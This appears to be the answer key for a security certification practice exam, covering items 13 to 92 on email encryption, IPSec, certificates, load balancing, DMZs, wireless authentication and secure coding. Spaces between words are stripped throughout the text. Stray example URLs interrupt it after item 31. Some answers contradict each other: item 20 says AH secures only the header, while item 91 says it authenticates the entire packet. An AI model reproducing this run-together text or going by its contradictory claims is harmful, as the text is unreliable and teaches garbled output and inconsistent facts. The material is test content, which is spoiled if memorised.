13. C. NadiashoulduseSecure/MultipurposeInternetMailExtensions(S/MIME),whichsupportsasymmetricencryptionandshouldthenuseDanielle’spublickeytoencrypttheemailsothatonlyDaniellecandecryptthemessagesandreadthem.SecurePOP3wouldprotectmessageswhilethey’rebeingdownloadedbutwouldnotprotectthecontentofthemessagesbetweenservers.

14. B. SRTPisasecureversionoftheReal-TimeTransportProtocolandisusedprimarilyforVoiceoverIP(VoIP)andmultimediastreamingorbroadcast.SRTP,ascurrentlyimplemented,doesnotfullyprotectpackets,leavingRTPheadersexposed,potentiallyexposinginformationthatmightprovideattackerswithinformationaboutthedatabeingtransferred.

15. C. Oliviashouldmakeherorganizationawarethatafailureinoneoftheactivenodeswouldresultinlessmaximumthroughputandapotentialforservicedegradation.Sinceservicesarerarelyrunatmaximumcapacity,andmanycanhavemaintenancewindowsscheduled,thisdoesnotmeanthattheloadbalancerscannotbepatched.Thereisnothinginthisdesignthatmakestheloadbalancersmorevulnerabletodenialofservicethantheywouldbeunderanyotherdesign.

16. A. FileTransferProtocolSecure(FTPS)typicallyusesport990forimplicitFTPSandport21,thenormalFTPcommandport,isusedfor


explicitFTPS.Port22isusedforSSH,433wasusedfortheNetworkNewsTransferProtocol(NNTP),1433isusedforMicrosoftSQL,andport20isusedforFTP.

17. A. CertificatestaplingallowstheserverthatispresentingacertificatetoprovideamoreefficientwaytochecktherevocationstatusofthecertificateviatheOnlineCertificateStatusProtocol(OCSP)byincludingtheOCSPresponsewiththehandshakeforthecertificate.Thisprovidesbothgreatersecuritybecauseclientsknowthatthecertificateisvalid,andgreaterefficiencybecausetheydon’thavetoperformaseparateretrievaltocheckthecertificate’sstatus.Therestoftheoptionsweremadeupandarenotcertificatestapling.

18. B. Aregistrationauthority,orRA,receivesrequestsfornewcertificatesaswellasrenewalrequestsforexistingcertificates.Theycanalsoreceiverevocationrequestsandsimilartasks.AnintermediaCAistrustedbytherootCAtoissuecertificates.ACRLisacertificaterevocationlist.

19. C. Leastconnection-basedloadbalancingtakesloadintoconsiderationandsendsthenextrequesttotheserverwiththeleastnumberofactivesessions.Roundrobinsimplydistributesrequeststoeachserverinorder,whereasweightedtimeuseshealthcheckstodeterminewhichserverrespondsthemostquicklyonanongoingbasisandthensendsthetraffictothatserver.Finally,sourceIPhashingusesthesourceanddestinationIPaddressestogenerateahashkeyandthenusesthatkeytotracksessions,allowinginterruptedsessionstobereallocatedtothesameserverandthusallowingthesessionstocontinue.

20. A. IPSec’sAuthenticationHeader(AH)protocoldoesnotprovidedataconfidentialitybecauseitsecuresonlytheheader,notthepayload.ThatmeansthatAHcanprovideintegrityandreplayprotectionbutleavestherestofthedataatrisk.MattshouldnotethisandexpressconcernsaboutwhytheVPNisnotusingEncapsulatingSecurityProtocol(ESP).

21. C. MichelleknowsthatPOP3runsonport110bydefault,andthatTLS(viaSTARTTLSasanextension)allowsPOP3clientstorequestasecureconnectionwithoutneedingtousethealternateport995usedinsomeconfigurations.Port25isthedefaultportforSimpleMailTransferProtocol(SMTP),andIKEisusedforIPSec.

22. A. Acloudaccesssecuritybroker(CASB)isasoftwaretoolorservicethatsitsbetweenanorganization’son-premisesnetworkandacloudprovider’s


infrastructure.ACASBactsasagatekeeper,allowingtheorganizationtoextendthereachoftheirsecuritypoliciesintothecloud.

23. A. Angela’scompanyhasdeployedaversionofSessionInitiationProtocol(SIP)thatdoesn’tuseTransportLayerSecurity(TLS)tomaintainconfidentiality.SheshouldswitchtoaSIPSecure(SIPS)implementationtoprotecttheconfidentialityofphoneconversations.Vishing,orvoicephishing;wardialing,whichattemptstomapallnumbersforaphoneservice,typicallytofindmodems;anddenialofservicearealllesslikelyonaVoIPnetwork,althoughtheycouldoccur.

24. B. ThefastestwayforAlainatoimplementsecuretransportforherNetworkTimeProtocol(NTP)trafficwilltypicallybetosimplytunnelthetrafficviaSecureShell(SSH)fromtheNTPservertoherLinuxsystems.AnIPSecvirtualprivatenetwork(VPN)betweendeviceswilltypicallytakemoreworktosetupandmaintain,althoughthiscouldbescripted,andaTransportLayerSecurity(TLS)VPNwouldrequireadditionalworksinceitisintendedforwebtraffic.RDPistheRemoteDesktopProtocolandisprimarilyusedforWindowssystemsandwouldnotbeagoodchoice.Inmostenvironments,however,NTPtrafficdoesnotreceiveanyspecialsecurity,andNTPsourcesaretrustedtoperformwithoutexceptionalsecuritymeasures.

25. D. ThesafestandmostsecureansweristhatRamonshouldsimplyimplementTLSfortheentiresite.AlthoughTLSdoesintroducesomeoverhead,modernsystemscanhandlelargenumbersofsimultaneousTLSconnections,makingasecurewebsiteaneasyanswerinalmostallcases.

26. D. AlthoughIPaddressesforpublicserversandclientsarenottypicallyconsideredsensitive,theusernames,passwords,andfilesthatthecontractorsusewouldbe.KatieshouldconsiderhelpingherorganizationtransitiontoasecureFTPorotherservicetoprotectherorganization’scustomersandtheorganizationitself.

27. D. DynamicHostConfigurationProtocol(DHCP)sniffingorsnoopingcanbeenabledtopreventrogueDHCPserversaswellasmaliciousormalformedDHCPtraffic.ItalsoallowsthecaptureandcollectionofDHCPbindinginformationtoletnetworkadministratorsknowwhoisassignedwhatIPaddress.

28. B. Aaroncanuseawildcardcertificatetocoverallthehostsinsideofasetofsubdomains.Wildcardsonlycoverasinglelevelofsubdomain,however,


soifhepurchased*.example.com,hecouldnotuse*.blog.example.com.Aself-signedcertificatewillcauseerrorsforvisitorsandshouldnotbeusedforproductionpurposes.Self-signedcertificateswillcreateerrorsinmostbrowsersandsoarenotusedinproductionenvironments.Extendedvalidation(EV)certificateswillnotprovidethisfunctionality,andSecureSocketsLayer(SSL)isnolongerinusewiththeswitchtoTLSforsecurityreasons.

29. D. RootGuardcanbesetonaper-portbasistoprotectportsthatwillneverbesetuptobetherootbridgeforaVLAN.Sincethisshouldn’tchangeregularly,itissafetosetformostportsinanetwork.Spanningtreeisusedtopreventloops,sodisablingSTPwouldactuallymakethisproblemmorelikely.BridgeIDscannotbenegative,andBridgeProtectwasmadeupforthisquestion.

30. C. APersonalInformationExchange(PFX)formattedfileisabinaryformatusedtostoreservercertificates,aswellasintermediarycertificates,anditcanalsocontaintheserver’sprivatekey.PrivacyEnhancedMail(PEM)filescancontainmultiplePEMcertificatesandaprivatekey,butmostsystemsstorecertificatesandthekeyseparately.DistinguishedEncodingRules(DER)formatfilesarefrequentlyusedwithJavaplatformsandcanstorealltypesofcertificatesandprivatekeys.P7B,orPKCS#7,formattedfilescancontainonlycertificatesandcertificatechains,notprivatekeys.Fortheexam,youshouldalsoknowthataCERisafileextensionforanSSLcertificatefileformatusedbywebserverstohelpverifytheidentityandsecurityofthesiteinquestion.SSLcertificatesareprovidedbyathird-partysecuritycertificateauthoritysuchasVeriSign,GlobalSign,orThawte.

AP12filecontainsadigitalcertificatethatusesPKCS#12(PublicKeyCryptographyStandard#12)encryption.TheP12filecontainsboththeprivateandthepublickey,aswellasinformationabouttheowner(name,emailaddress,etc.),allbeingcertifiedbyathirdparty.Withsuchacertificate,ausercanidentifythemselvesandauthenticatethemselvestoanyorganizationtrustingthethirdparty.

31. D. Afirewallhastwotypesofrules.Onetypeistoallowspecifictrafficonagivenport.Theothertypeofruleistodenytraffic.Whatisshownhereisatypicalfirewallrule.OptionsA,B,andCareincorrect.Theruleshownisclearlyafirewallrule.


http://example.com

http://blog.example.com

32. C. ManysubscriptionservicesallowfordataretrievalviaHTTPS.Tedcansubscribetooneormorethreatfeedsorreputationservices,andthenfeedthatinformationtoanintrusiondetectionsystem(IDS),intrusionpreventionsystem(IPS),next-generationfirewall,orsimilarnetworksecuritytool.SecurityAssertionMarkupLanguage(SAML)isusedtomakeassertionsaboutidentitiesandauthorization,aVDIisavirtualdesktopenvironment,andFDEisfull-diskencryption.

33. B. SecurecookiesareHTTPcookiesthathavethesecureflagset,thusrequiringthemtoonlybesentviaasecurechannellikeHTTPS.Theyarenotstoredinencryptedformorhashed,andcookiekeysweremadeupforthisquestion.

34. D. UnlikeIPSec’stunnelmode,IPSectransportmodeallowsdifferentpoliciesperport.TheIPaddressesintheouterheaderfortransportmodepacketsareusedtodeterminethepolicyappliedtothepacket.IPSecdoesn’thaveaPSKmode,butWPA-2does.IKEisusedtosetupsecurityassociationsinIPSecbutdoesn’tallowthistypeofmodesetting.

35. A. WPSpersonalidentificationnumbers(PINs)wererevealedtobeaproblemin2011,whenapracticalbrute-forceattackagainstWPSPINsetupmodeswasdemonstrated.WPSsuffersfromavarietyofothersecurityissuesandisnotusedforenterprisesecurity.WPSremainsinuseinhomeenvironmentsforeaseofsetup.

36. C. TheOnlineCertificateStatusProtocol,orOCSP,isusedtodeterminethestatusofacertificate.RTCP,CRBL,andPKCRLwereallmadeupforthisquestion.

37. C. Certificaterevocationlists(CRLs)aredesignedspecificallyforrevokingcertificates.Sincepublickeysaredistributedviacertificates,thisisthemosteffectivewaytodeauthorizeapublickey.OptionAisincorrect.Simplynotifyingusersthatakey/certificateisnolongervalidisnoteffective.OptionBisincorrect.Deletingacertificateisnotalwayspossibleandignoresthepossibilityofaduplicateofthatcertificateexisting.OptionDisincorrect.Theregistrationauthority(RA)isusedincreatingnewcertificates,notinrevokingthem.

38. C. GlobalPositioningSystem(GPS)dataanddataaboutlocalWi-Finetworksarethetwomostcommonlyusedprotocolstohelpgeofencingapplicationsdeterminewheretheyare.WhenaknownWi-Fisignalisgainedorlost,thegeofencingapplicationknowsitiswithinrangeofthat


network.GPSdataisevenmoreusefulbecauseitcanworkinmostlocationsandprovideaccuratelocationdata.AlthoughBluetoothissometimesusedforgeofencing,itslimitedrangemeansthatitisathirdchoice.Cellularinformationwouldrequireaccuratetower-basedtriangulation,whichmeansitisnottypicallyusedforgeofencingapplications,andofcourseUSBisawiredprotocol.

39. A. Thedemilitarizedzone(DMZ)isazonebetweenanouterfirewallandaninnerfirewall.Itisspecificallydesignedasaplacetolocatepublic-facingservers.Theouterfirewallismorepermissive,thusallowingpublicaccesstotheserversintheDMZ.However,theinnerfirewallismoresecure,thuspreventingoutsideaccesstothecorporatenetwork.

40. C. Thefirststepinsecurityishardeningtheoperatingsystem,andoneofthemostelementaryaspectsofthatisturningoffunneededservices.Thisistrueregardlessoftheoperatingsystem.Althoughinstallingantimalware,implementingusagepolicies,andsettingpasswordreusepoliciesareallgoodpractices,turningoffunnecessaryservicesistypicallythefirststepinsecuringasystem..

41. C. Knowledge-basedauthenticationrequiresinformationthatonlytheuserislikelytoknow.Examplesincludethingslikeprevioustaxpayments,billamounts,andsimilarinformation.RequestingaSocialSecuritynumberislesssecureandwouldonlyworkforusersintheUnitedStates.FederatedidentityviaGoogleaccountsdoesnotmeetthisneedbecauseGoogleaccountsdonothaveauservalidationrequirement.Finally,validationemailsonlyprovethattheuserhasaccesstoanaccountthattheyprovide,notthattheyareaspecificindividual.

42. A. ATransportLayerSecurity(TLS)VPNisfrequentlychosenwheneaseofuseisimportant,andwebapplicationsaretheprimaryusagemode.IPSecVPNsareusedforsite-to-siteVPNsandforpurposeswhereotherprotocolsmaybeneeded,becausetheymaketheendpointsystemappeartobeontheremotenetwork.

43. A. Full-diskencryption(FDE)fullyencryptstheharddriveonacomputer.Thisisaneffectivemethodforensuringthesecurityofdataonacomputer.TrustedPlatformModules(TPMs)arestorekeysandareusedforbootintegrityandothercryptographicneedsandwon’tdirectlyprotectthedata.Software-definednetworking(SDN)isvirtualizednetworking,anddemilitarizedzones(DMZs)areusedtosegmentanetworkandwon’taffect


thisproblem.

44. A. ADMZ(demilitarizedzone)provideslimitedaccesstopublic-facingserversforoutsideusers,butblocksoutsideusersfromaccessingsystemsinsidetheLAN.ItisacommonpracticetoplacewebserversintheDMZ.AvirtualLAN,orVLAN,ismostoftenusedtosegmenttheinternalnetwork,routersdirecttrafficbasedonIPaddress,andaguestnetworkallowsinternaluserswhoarenotemployeestogetaccesstotheInternet.

45. D. Identityattributesarecharacteristicsofanidentity,includingdetailsliketheindividual’sbirthdate,age,jobtitle,address,oramultitudeofotherdetailsabouttheidentity.Theyareusedtodifferentiatetheidentityfromothersandmayalsobeusedbytheidentitymanagementsystemorconnectedsystemsincoordinationwiththeidentityitself.Rolesdescribethejoborpositionanindividualhasinanorganization,andfactorsaresomethingyouknow,somethingyouhave,orsomethingyouare.Identifiersarenotacommonsecurityorauthenticationterm,althoughidentityis.

46. D. TheCN,orcommonname,foracertificateforasystemistypicallythefullyqualifieddomainname(FQDN)fortheserver.IfMeganwasrequestingacertificateforherself,insteadofforaserver,shewoulduseherfullname.

47. B. PhysicallyportioningyournetworkisthephysicalequivalentofavirtualLAN,orVLAN.AVLANisdesignedtoemulatephysicalpartitioning.Perimetersecuritydoesnotsegmentthenetwork.Securityzonesareusefulbutdon’t,bythemselves,segmentanetwork.Oftenanetworkissegmented,usingphysicalpartitionsorVLAN,tocreatesecurityzones.Afirewallismeanttoblockcertaintraffic,nottosegmentthenetwork,althoughafirewallcanbepartofasegmentationorsecurityzoneimplementation.

48. D. Nelsonisusingawhitelisting(orallowedlist)tool.Toolslikethisallowonlyspecificapplicationstobeinstalledandrunonasystemandoftenusehashesofknowngoodapplicationstoensurethattheapplicationsarethosethatarepermitted.Ablacklisting(orblockedlist)toolpreventsspecificapplicationsorfilesfrombeingused,stored,ordownloadedtoasystem.Althoughantivirusandantimalwaretoolsmayhavesimilarfeatures,themostaccurateanswerhereiswhitelisting.

49. B. Astatefulinspectionfirewallexaminesthecontentandcontextofeachpacketitencounters.Thismeansthatastatefulpacketinspection(SPI)


firewallunderstandstheprecedingpacketsthatcamefromthesameIPaddress,andthusthecontextofthecommunications.Thismakescertainattacks,likeaSYNflood,almostimpossible.Packetfilteringfirewallsexamineeachpacketbutnotthecontext.Application-layerfirewallscanuseSPIorsimplepacketfiltering,buttheirprimaryroleistoexamineapplication-specificissues.Acommonexampleisawebapplicationfirewall.Agatewayfirewallissimplyafirewallatthenetworkgateway.ThisdoesnottelluswhetheritispacketfilteringorSPI.

50. A. Wirelessnetworkheatmapsareusedtoshowhowstrongwirelessnetworksignalsarethroughoutabuildingorlocation.Scottcanuseaheatmaplikethistoseewherethewirelesssignaldropsofforwhereinterferencemayoccur.Anetworkdiagramwouldshowthelogicallayoutofanetwork.Ademilitarizedzone(DMZ)isanetworksecurityzonethatisexposedtoahigherriskregion,andazonemapisnotacommonsecurityterm.

51. B. Ademilitarizedzone(DMZ)isaseparatesubnetcomingofftheseparaterouterinterface.PublictrafficmaybeallowedtopassfromtheexternalpublicinterfacetotheDMZ,butitwon’tbeallowedtopasstotheinterfacethatconnectstotheinternalprivatenetwork.AguestnetworkprovidesvisitorswithInternetaccess.Anintranetconsistsofinternalwebresources.Frequentlycompaniesputupwebpagesthatareaccessibleonlyfromwithinthenetworkforitemslikehumanresourcesnotifications,vacationrequests,andsoforth.AvirtualLAN,orVLAN,isusedtosegmentyourinternalnetwork.

52. C. Theapplicationincludesinputvalidationtechniquesthatareusedtoensurethatunexpectedormaliciousinputdoesnotcauseproblemswiththeapplication.Inputvalidationtechniqueswillstripoutcontrolcharacters,validatedata,andperformavarietyofotheractionstocleaninputbeforeitisprocessedbytheapplicationorstoredforfutureuse.Thisvalidationmayhelppreventbufferoverflows,butothertechniquesdescribedherearenotusedforbufferoverflowprevention.Stringinjectionisactuallysomethingthishelpstoprevent,andschemavalidationlooksatdatatoensurethatrequestsmatchaschema,butagainthisisanarrowerdescriptionthanthebroadrangeofinputvalidationoccurringinthedescription.

53. C. WPA3supportsSAE,orsimultaneousauthenticationofequals,providingamoresecurewaytoauthenticatethatlimitsthepotentialforbrute-forceattacksandallowsindividualstousedifferentpasswords.WPA


isnotassecureasWPA2,andWEPistheoldest,andleastsecure,wirelesssecurityprotocol.

54. A. Inordertostopattacktraffic,anIPSneedstobedeployedinline.Deploymentsthatuseanetworktapreceiveacopyofthedatawithoutbeingintheflowoftraffic,whichmakesthemidealfordetectionbutremovestheabilitytostoptraffic.Deployingasanintrusiondetectionsystem(IDS)insteadofanIPSmeansthatthesystemwillonlydetect,notstop,attacks.

55. B. Thecorrectansweristouseasandboxedenvironmenttotestthemalwareanddetermineitscompletefunctionality.Asandboxedsystemcouldbeanisolatedvirtualmachine(VM)oranactualphysicalmachinethatisentirelyisolatedfromthenetwork.Leavingthemalwareonaproductionsystemisneverthecorrectapproach.Youshouldtestoranalyzethemalwaretodetermineexactlywhatmalwareitis,allowingyoutorespondtothethreatproperly.Ahoneypotisusedforluringandtrappingattackers,notfortestingmalware.

56. B. Hardeningistheprocessofimprovingthesecurityofanoperatingsystemorapplication.OneoftheprimarymethodsofhardeningatrustedOSistoeliminateunneededprotocols.ThisisalsoknownascreatingasecurebaselinethatallowstheOStorunsafelyandsecurely.FDEisfull-diskencryption,aSEDisaself-encryptingdrive,andbaseliningistheprocessofestablishingsecuritystandards.

57. C. Althoughtrustinthesiteislikelytobereducedbecauseuserswillreceivewarnings,theactualunderlyingencryptioncapabilitieswillnotchange.Userswillnotberedirectedtothecertificateauthority’ssite,andiftheyclickpastthewarnings,userswillbeabletocontinuenormallyandwithanencryptedconnection.

58. D. Isaacknowsthattrustingclientsystemstobesecureisnotagoodidea,andthusensuringthatvalidationoccursonatrustedclientisnotanappropriaterecommendation.Ensuringthatvalidationoccursonatrustedserver,thatclientdataisvalidated,andthatdatatypesandrangesarereasonableareallgoodbestpracticesforhimtorecommend.

59. C. TrustedPlatformModules(TPMs)providearandomnumbergenerator,theabilitytogeneratecryptographickeys,supportforremoteattestationaspartofthebootprocess,aswellasbindingandsealingcapabilities.TheydonotactascryptographicprocessorstospeedupSecureSocketsLayer(SSL)


orTransportLayerSecurity(TLS)traffic.

60. B. Hashingiscommonlyusedindatabasestoincreasethespeedofindexingandretrievalsinceitistypicallyfastertosearchforahashedkeyratherthantheoriginalvaluestoredinadatabase.Hashingisnotaformofencryption,meaningthatitisnotusedtoencryptstoreddata.Hashingisnotusedtoobfuscatedataortosubstituteforsensitivedata.

61. C. Thecorrectansweristoonlyallowsignedcomponentstobeloadedinthebrowser.Codesigningverifiestheoriginatorofthecomponent(suchasanActiveXcomponent)andthusmakesmalwarefarlesslikely.Althoughhost-basedantimalwareisagoodidea,itisnotthebestremedyforthisspecificthreat.Blacklistscannotcoverallsitesthatareinfected—justthesitesyouknowabout.AndgiventhatusersonHans’snetworkvisitalotofwebsites,blacklistingislikelytobeineffective.Finally,ifyoublockallactivecontent,manywebsiteswillbecompletelyunusable.

62. B. Zarmeenahasimplementedapresharedkey,orPSK,authenticationmethod.Thismeansthatifsheneedstochangethekeybecauseastaffmemberleaves,shewillneedtohaveeverydeviceupdatetheirpassphrase.Forlargerdeployments,enterpriseauthenticationcanconnecttoanauthenticationandauthorizationservice,allowingeachusertoauthenticateasthemselves.Thisalsoprovidesnetworkadministratorswithawaytoidentifyindividualdevicesbytheirauthenticateduser.Opennetworksdonotrequireauthentication,althoughacaptiveportalcanbeusedtorequirenetworkuserstoprovideinformationbeforetheyareconnectedtotheInternet.

63. A. EAP-FASTisspecificallydesignedfororganizationsthatwanttoquicklycompletereconnectionsanddoesnotrequirecertificatestobeinstalledattheendpointdevice.EAPTunneledTransportLayerSecurity(EAP-TTLS)requiresclient-sidecertificates;EAP-TLSrequiresmutualauthentication,whichcanbeslower;andProtectedExtensibleAuthenticationProtocol(PEAP)issimilartoEAP-TTLS.

64. A. Thecorrectansweristoimplementavirtualdesktopinfrastructure(VDI).Ifallthedesktopsarevirtualized,thenfromasinglecentrallocationyoucanmanagepatches,configuration,andsoftwareinstallation.Thissingleimplementationwillsolvealltheissuesmentionedinthequestion.Restrictivepoliciesareagoodideabutareoftendifficulttoenforce.Imagingworkstationswillaffectonlytheiroriginalconfiguration;itwon’t


keepthempatchedorpreventroguesoftwarefrombeinginstalled.Finally,strongpatchmanagementwilladdressonlyoneofthethreeconcerns.

65. B. Deployingtomultiplelocationsispartofahighavailabilitystrategythatensuresthatlosingadatacenterordatacentersinasingleregion,orlossofnetworkconnectivitytothatregion,willnottakeaninfrastructuredown.Thisdoesnotprovidegreaterresistancetoinsiderattacks,lowercosts,orvendordiversity.

66. B. ATLS-basedVPN(oftencalledanSSL-basedVPN,despiteSSLbeingoutmoded)providestheeasiestwayforuserstouseVPNsinceitdoesnotrequireaclient.SSLVPNsalsoworkonlyforspecificapplicationsratherthanmakingasystemappearasthoughitisfullyonaremotenetwork.HTML5isnotaVPNtechnology,butsomeVPNportalsmaybebuiltusingHTML5.SecurityAssertionMarkupLanguage(SAML)isnotaVPNtechnology.IPSecVPNsrequireaclientorconfigurationandarethusharderforenduserstouseinmostcases.

67. C. Theseparticularwebapplicationattacksarebestmitigatedwithproperinputvalidation.Anyuserinputshouldbecheckedforindicatorsofcross-sitescripting(XSS)orSQLinjection.Errorhandlingisalwaysimportant,butitwon’tmitigatetheseparticularissues.StoredprocedurescanbeagoodwayofensuringSQLcommandsarestandardized,butthatwon’tpreventtheseattacks.Codesigningisusedforcodethatisdownloadedfromawebapplicationtotheclientcomputer;itisusedtoprotecttheclient,notthewebapplication.

68. C. Isaaccanconfigureageofencethatdefineshiscorporatebuildingsandcampus.Hecanthensetupageofencepolicythatwillonlyallowdevicestoworkwhiletheyareinsidethatgeofencedarea.Patchmanagement,IPfiltering,andnetworkrestrictionsarenotsuitablesolutionsforthis.

69. B. Fuzzingisatechniquewherebythetesterintentionallyentersincorrectvaluesintoinputfieldstoseehowtheapplicationwillhandleit.Staticcodeanalysistoolssimplyscanthecodeforknownissues,baseliningistheprocessofestablishingsecuritystandards,andversioncontrolsimplytrackschangesinthecode—itdoesnottestthecode.

70. B. Althoughhardwaresecuritymodules(HSMs)providemanycryptographicfunctions,theyarenotusedforbootattestation.ATPM,orTrustedPlatformModule,isusedforsecurebootattestation.

71. A. CynthiashoulddeployRadioFrequencyIdentifier(RFID)cards,which


canbereadusingcontactlessreaders.RFIDtechnologyiscommonandrelativelyinexpensive,butwithoutadditionalauthentication,possessionofacardistheonlymeansofdeterminingifsomeoneisauthorizedtoaccessabuildingorroom.Wi-Fiisnotusedforcontactlesscardsbecauseofitspowerconsumptionandoverhead.Magstripesrequireareaderratherthanbeingcontactless,andHOTPisaformofone-timepasswordsystem.

72. B. Ratelimitingandback-offalgorithmsbothlimithowquicklyqueriescanbeperformed.Requiringauthenticationwouldrestrictwhocouldaccessthedirectory.RequiringLDAPS(LightweightDirectoryAccessProtocoloverSSL)doesnotpreventenumeration,butitdoesprovidesecurityforthequeriedinformationasittransitsnetworks.

73. D. ASAN,orSubjectAlternateName,certificateallowsmultiplehostnamestobeprotectedbythesamecertificate.ItisnotatypeofcertificateforSANstoragesystems.ASANcertificatecouldbeself-signed,butthatdoesnotmakeitaSANcertificate,andofcoursethesecurityorganizationSANSisnotacertificateauthority.

74. A. Thecorrectansweristoassigndigitalcertificatestotheauthorizedusersandtousethesetoauthenticatethemwhenloggingin.Thisisaneffectivewaytoensurethatonlyauthorizeduserscanaccesstheapplication.Althoughtheremainingoptionsareallgoodsecuritymeasures,theyarenotthebestwaytoauthenticatetheclientandpreventunauthorizedaccesstotheapplication.

75. D. Thecorrectansweristofirsttestpatches.Itisalwayspossiblethatapatchmightcauseissuesforoneormorecurrentapplications.Thisisparticularlyaconcernwithapplicationsthathavealotofinteractionwiththehostoperatingsystem.Anoperatingsystempatchcanpreventtheapplicationfromexecutingproperly.Butassoonasthepatchesaretested,aphasedrollouttothecompanyshouldbegin.Automaticpatchingisnotrecommendedincorporateenvironmentsbecauseapatchcouldpossiblyinterferewithoneormoreapplications—thus,amanagedpatchdeploymentprocessisimplementedthatrequiresmoreadministrativetimebutavoidsoutagesduetopatcheswithissuesinanorganization’sspecificenvironment.Havingindividualuserspatchtheirownmachinesisabadideaandwillleadtoinconsistentpatchingandtheapplicationofuntestedpatches.DelegatingpatchmanagementtomanagersinsteadofITstaffcanleadtoproblems,too,duetovaryingskillsetsandpractices.


76. B. Althoughwirelessanalyzersprovidein-depthinformationaboutServiceSetIdentifiers(SSIDs),signalstrength,andprotocolversions,theRemoteAuthenticationDial-InUserService(RADIUS)orKerberosversionnumberforthebackendauthenticationserversisnotsomethingthattheywilltypicallybeabletoprovide.

77. B. Thecorrectansweristoturnoffanyremoteaccesstosuchdevicesthatisnotabsolutelyneeded.ManyperipheraldevicescomewithSSH(SecureShell),Telnet,orsimilarservices.Ifyouarenotusingthem,turnthemoff.Manyperipheralsdon’thavediskstoencrypt,makingfull-diskencryption(FDE)alessusefulchoice.Fuzztestingisusedtotestcode,notdevices,andperipheralsareunlikelytosupportdigitalcertificatesinmostcases.

78. C. Manualcodereviewisatypeofstaticcodereviewwherereviewersreadthroughsourcecodetoattempttofindflawsinthecode.Dynamiccodereviewrequiresrunningthecode,Fagantestingisaformalcodereviewprocessthatworksthroughmultiplephasesofthedevelopmentprocess,andfuzzingisaformofdynamicinspectionthatsendsunexpectedvaluestoarunningprogram.

79. C. SamanthashouldplaceherpublicSSHkeyinthe.sshdirectoryinherhomedirectoryontheremoteserver.Privatekeysshouldneverbeoutsideofyourcontrol,andunlikemanyLinuxconfigurations,SSHkeysarenotkeptinthe/etc/directory.

80. C. Thecorrectansweristousestaticcodeanalysis.Memoryleaksareusuallycausedbyfailuretodeallocatememorythathasbeenallocated.Astaticcodeanalyzercanchecktoseeifallmemoryallocationcommands(malloc,alloc,etc.)haveamatchingdeallocationcommand.Fuzzinginvolvesenteringdatathatisoutsideexpectedvaluestoseehowtheapplicationhandlesit.Stresstestinginvolvestestinghowasystemhandlesextremeworkloads.Normalizationisatechniquefordeduplicatingadatabase.

81. D. LoadbalancersprovideavirtualIP,orVIP.TrafficsenttotheVIPisdirectedtoserversinthepoolbasedontheload-balancingschemethatthatpoolisusing—oftenaround-robinscheme,butotherversionsthatincludepriorityorderandcapacitytrackingorratingsarealsocommon.Theloadbalancer’sIPaddressisnormallyusedtoadministerthesystem,andindividualIPaddressesfortheclusteredhostsareshieldedbytheloadbalancertopreventtrafficfromconsistentlygoingtothosehosts,thus


creatingafailureorloadpoint.

82. D. Inawell-implementedpasswordhashingscheme,uniquerandombitscalledsaltsareaddedtoeachpasswordbeforetheyarehashed.Thismakesgeneratingarainbowtableorotherwisebrute-forcinghashesforallofthepasswordsstoredinadatabaseextremelytime-consuming.Theremainingoptionsweremadeupandarenotactualsecurityterms.

83. A. ThecorrectansweristouseSecureShell(SSH).Thisprotocolisencrypted.SSHalsoauthenticatestheuserwithpublickeycryptography.Telnetisinsecureanddoesnotencryptdata.RSH,orRemoteShell,sendsatleastsomedataunencryptedandisalsoinsecure.SNMP,orSimpleNetworkManagementProtocol,isusedtomanageanetworkandisnotusedforremotecommunications.

84. A. Resource-basedpoliciesareattachedtoresourcesanddeterminewhohasaccesstoaresource,suchasagroupofsysadminsordevelopers,andwhatactionstheycanperformontheresource.Cloudserviceshavedifferenttermsformonitoringtheirresourceusage;thesetermsmayvaryfromservicetoservice.

85. A. Networkedsensorappliancesaredeployedinmanydatacenterstogatherinformationabouttemperatureandhumidityaspartoftheenvironmentalmonitoringsystem.Firedetectionandsuppressionsystemsarenottypicallymountedinracks,andpowerqualityandreliabilityismeasuredbyPDUs(powerdistributionunits),UPS(uninterruptablepowersupplies),andotherpowerinfrastructure.

86. C. SecureIMAP’sdefaultportisTCP993.LaurelcaneasilyguessthatthesystemoffersaTLS-protectedversionofIMAPforclientstousetoretrieveemailmessages.ThedefaultportforsecurePOPis995,andforsecureSMTPthedefaultportis587.S/MIMEdoesnothaveaspecificport,asitisusedtoencryptthecontentofemailmessages.

87. C. Adhocwirelessnetworksoperateinapoint-to-pointtopology.Infrastructuremodeaccesspointsworkinapoint-to-multipointtopology.Starandbusmodelsareusedinwirednetworks.

88. C. Onlyusingcodethatisdigitallysignedverifiesthecreatorofthesoftware.Forexample,ifaprinter/multifunctiondevice(MFD)driverisdigitallysigned,thisgivesyouconfidencethatitreallyisaprinterdriverfromthevendoritpurportstobefrom,andnotmalwaremasqueradingasaprinterdriver.Signedsoftwaregivesyouahighdegreeofconfidencethatit


isnotmalwarebutdoesnotprovideaguarantee.Forexample,theinfamousFlameviruswassignedwithacompromisedMicrosoftdigitalcertificate.Digitalsigningofsoftwarehasnoeffectonpatchmanagement.Finally,digitallysignedsoftwarewillnotexecutefasterorslowerthanunsignedsoftware.

89. D. TheSecurity+examreferstopasswordmanagersaspasswordvaults.Samanthashouldrecommendapasswordvaultthatwillallowheruserstogenerate,store,andusemanypasswordssecurely.Noneoftheotheroptionsaregoodadviceforpassworduseandstorage.

90. A. PortsecurityfiltersbyMACaddress,allowingwhitelistedMACaddressestoconnecttotheportandblockingblacklistedMACaddresses.Portsecuritycanbestatic,usingapredeterminedlistordynamicallyallowingaspecificnumberofaddressestoconnect,oritcanberuninacombinationmodeofbothstaticanddynamicmodes.

91. C. Authenticationheaders(AHs)providecompletepacketintegrity,authenticatingthepacketandtheheader.Authenticationheadersdonotprovideanyencryptionatall,andauthenticationheadersauthenticatetheentirepacket,notjusttheheader.

92. B. AsplithorizonDNSimplementationdeploysdistinctDNSserversfortwoormoreenvironments,ensuringthatthoseenvironmentsreceiveDNSinformationappropriatetotheDNSviewthattheirclientsshouldreceive.DomainNameSystemSecurityExtensions(DNSSEC)isaDNSsecuritysetofspecificationstohelpprotectDNSdata.DMZDNSandDNSproxyingarenotdesignpatternsorcommontermsusedinthesecurityornetworkingfield.

